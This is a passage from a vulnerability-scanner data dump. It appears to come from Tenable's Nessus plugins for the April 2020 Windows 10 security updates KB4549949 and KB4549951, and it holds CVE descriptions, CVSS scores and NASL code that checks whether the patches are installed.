with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-0917,\n CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4549949/windows-10-update-kb4549949\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3387c2f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4549949.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4549949');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549949])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:15:23", "description": "The remote Windows host is missing security update 4549951.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0939, CVE-2020-0945, CVE-2020-0946, CVE-2020-0947)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A security feature bypass vulnerability exists when Windows fails to properly handle token relationships. An attacker who successfully exploited the vulnerability could allow an application with a certain integrity level to execute code at a different integrity level, leading to a sandbox escape. The update addresses the vulnerability by correcting how Windows handles token relationships (CVE-2020-0981)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-0917, CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4549951: Windows 10 Version 1903 and Windows 10 Version 1909 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4549951.NASL", "href": "https://www.tenable.com/plugins/nessus/135464", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135464);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0910\",\n \"CVE-2020-0913\",\n \"CVE-2020-0917\",\n \"CVE-2020-0918\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0939\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0947\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0981\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4549951\");\n script_xref(name:\"MSFT\", value:\"MS20-4549951\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4549951: Windows 10 Version 1903 and Windows 10 Version 1909 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4549951.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0939, CVE-2020-0945, CVE-2020-0946,\n CVE-2020-0947)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A security feature bypass vulnerability exists when\n Windows fails to properly handle token relationships. An\n attacker who successfully exploited the vulnerability\n could allow an application with a certain integrity\n level to execute code at a different integrity level,\n leading to a sandbox escape. The update addresses the\n vulnerability by correcting how Windows handles token\n relationships (CVE-2020-0981)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery 